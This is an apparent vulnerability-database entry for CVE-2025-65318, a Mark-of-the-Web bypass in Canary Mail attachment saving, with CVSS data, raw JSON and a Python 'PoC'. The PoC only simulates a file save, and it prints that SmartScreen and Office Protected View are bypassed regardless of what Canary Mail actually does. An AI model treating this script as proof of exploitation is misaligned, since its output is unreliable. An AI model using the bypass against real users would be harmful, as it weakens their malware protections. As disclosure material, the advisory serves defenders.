Security Vulnerability Report
中文
CVE-2025-65318 CVSS 9.1 CRITICAL

CVE-2025-65318

Published: 2025-12-16 16:16:00
Last Modified: 2025-12-31 00:38:32
Source: [email protected]

Description

When using the attachment interaction functionality, Canary Mail 5.1.40 and below saves documents to a file system without a Mark-of-the-Web tag, which allows attackers to bypass the built-in file protection mechanisms of both Windows OS and third-party software.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:canarymail:canary_mail:*:*:*:*:*:windows:*:* - VULNERABLE
Canary Mail <= 5.1.40

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65318 PoC - Mark-of-the-Web Bypass via Canary Mail Attachment # This PoC demonstrates the absence of Zone.Identifier on files saved via Canary Mail import smtplib from email.mime.multipart import MIMEMultipart from email.mime.base import MIMEBase from email import encoders import os def check_motw_exists(file_path): """Check if Mark-of-the-Web zone identifier exists for a file""" try: # Zone.Identifier is stored in NTFS Alternate Data Stream ads_path = file_path + ':Zone.Identifier' if os.path.exists(ads_path): with open(ads_path, 'r') as f: content = f.read() print(f'[+] Zone.Identifier found: {content}') return True else: print(f'[-] No Zone.Identifier found - MotW missing!') return False except Exception as e: print(f'[-] Error checking MotW: {e}') return False def create_malicious_attachment(): """Create a malicious document for demonstration""" # This represents a document that would be saved via Canary Mail # In real attack, this could be an Office document with malicious macros malicious_content = b'MZ' + b'\x00' * 100 # Simulated executable header return malicious_content def simulate_canary_mail_save(file_data, output_path): """ Simulate how Canary Mail saves attachments WITHOUT MotW This is the vulnerable behavior that causes CVE-2025-65318 """ try: with open(output_path, 'wb') as f: f.write(file_data) # Check if MotW was added (it won't be in vulnerable version) has_motw = check_motw_exists(output_path) if not has_motw: print('[!] VULNERABLE: File saved without Mark-of-the-Web!') print('[!] This file will bypass Windows SmartScreen and other protections') return not has_motw # Returns True if vulnerable except Exception as e: print(f'[-] Error saving file: {e}') return False def demonstrate_attack_scenario(): """Demonstrate the attack scenario using this vulnerability""" print('=' * 60) print('CVE-2025-65318 Attack Scenario Demonstration') print('=' * 60) # Step 1: Attacker sends email with malicious attachment via Canary Mail print('\n[Step 1] Attacker sends email with malicious attachment') # Step 2: Victim uses Canary Mail to save the attachment print('\n[Step 2] Victim saves attachment using Canary Mail') test_file = 'malicious_document.docm' file_data = create_malicious_attachment() is_vulnerable = simulate_canary_mail_save(file_data, test_file) # Step 3: Without MotW, file bypasses security checks if is_vulnerable: print('\n[Step 3] File bypasses security mechanisms:') print(' - Windows SmartScreen: BYPASSED') print(' - Office Protected View: DISABLED') print(' - EDR Behavioral Detection: WEAKENED') # Cleanup if os.path.exists(test_file): os.remove(test_file) return is_vulnerable if __name__ == '__main__': demonstrate_attack_scenario()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65318", "sourceIdentifier": "[email protected]", "published": "2025-12-16T16:15:59.673", "lastModified": "2025-12-31T00:38:32.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When using the attachment interaction functionality, Canary Mail 5.1.40 and below saves documents to a file system without a Mark-of-the-Web tag, which allows attackers to bypass the built-in file protection mechanisms of both Windows OS and third-party software."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canarymail:canary_mail:*:*:*:*:*:windows:*:*", "versionEndIncluding": "5.1.40", "matchCriteriaId": "7B155EAD-E397-419A-AEF7-1693131AF515"}]}]}], "references": [{"url": "http://canary.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://canarymail.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://drive.google.com/file/d/14wrTzvcLPfFsWmy-SAtDwwZKKPssBsx5/view", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/bbaboha/CVE-2025-65318-and-CVE-2025-65319", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/nickvourd/RTI-Toolkit", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/bbaboha/CVE-2025-65318-and-CVE-2025-65319", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.